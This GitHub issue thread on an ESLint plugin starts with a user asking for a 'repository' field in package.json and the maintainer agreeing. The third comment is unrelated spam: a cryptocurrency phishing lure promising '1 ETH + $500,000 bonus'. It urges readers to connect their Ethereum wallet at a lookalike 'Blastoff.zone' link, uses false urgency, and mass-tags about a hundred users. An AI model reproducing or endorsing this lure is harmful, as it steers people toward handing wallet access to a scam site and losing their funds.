### ISSUE TITLE
Please add repo to package.json

### ISSUE THREAD

**Issue by moltar** [ipasechnikov/eslint-plugin-deprecated-rules#1]
Add this to `package.json` to make it easier to discover this repo from npmjs.com:

```json
  "repository": {
    "type": "git",
    "url": "https://github.com/ipasechnikov/eslint-plugin-deprecated-rules/"
  },
```

The link to the repo would then show up in the sidebar:

![screenshot-20240205T104343-Hbrsk3in@2x](https://github.com/ipasechnikov/eslint-plugin-deprecated-rules/assets/491247/0c69c8e7-fafc-478f-9a7b-016bce73dc69)

**Comment by ipasechnikov** [comment]
@moltar Thank you for a nice proposal. Updated `package.json` your recommended way.

**Comment by swdthomas** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
Seration, @souzagab, @logerrors, @adityasanil, @Fox-coding-797, @pblue3, @dorucioclea, @617a7aa, @smolgrrr, @DH0l, @Ladbaby, @quantumsheep, @kmark, @hirawatt, @anatolinicolae, @xn3cr0nx, @krysialynne, @hzhu, @bukhalo, @k7zy, @davidmasp, @Sherzod-Norkulov, @timdeputter, @topqaz, @Latschenharry, @oooh-name, @benoitberenger, @mbaeuerle, @koneko096, @tn, @m18h, @mak2014, @lRomul, @META-DREAMER, @blackout314, @Wes974, @brunatessaro, @Alvaniss, @pfs-db, @MarshalX, @TetrisIQ, @ar-jan, @but-whythough, @MeerBiene, @Snake87r, @SubhanRaj, @zoonderkins, @majikaz, @timartlaw, @5l1v3r1mateusfn98, @radualexe32, @Lai681110, @ajtatum, @Pitanova, @daledude, @EthyMoney, @frankfanslc, @tompipe, @PankajRPandey, @guerreiro, @huagetai, @dustycn, @ik5, @wsturner88, @MrCesar107, @tpoomlmly, @JiaWeiXie, @fwartner, @chitowncrispy, @fannheyward, @dfjs, @isa-manghi, @MarcBTC, @mcreed, @VictorWylde, @thewhitewizard, @RobinLinus, @azlekov, @m18h, @Musharofchy, @strpc, @haskovec, @adidoes, @Peng1029, @rmonier, @sharknoon, @0x1a8510f2, @shouryaraj, @joshnock, @ccatterina, @highghlow, @JibJiby, @Zykkl, @manashan, @nyspqr, @Ducky404, @magiknono, @cyunfeng2021, @fabioassuncao
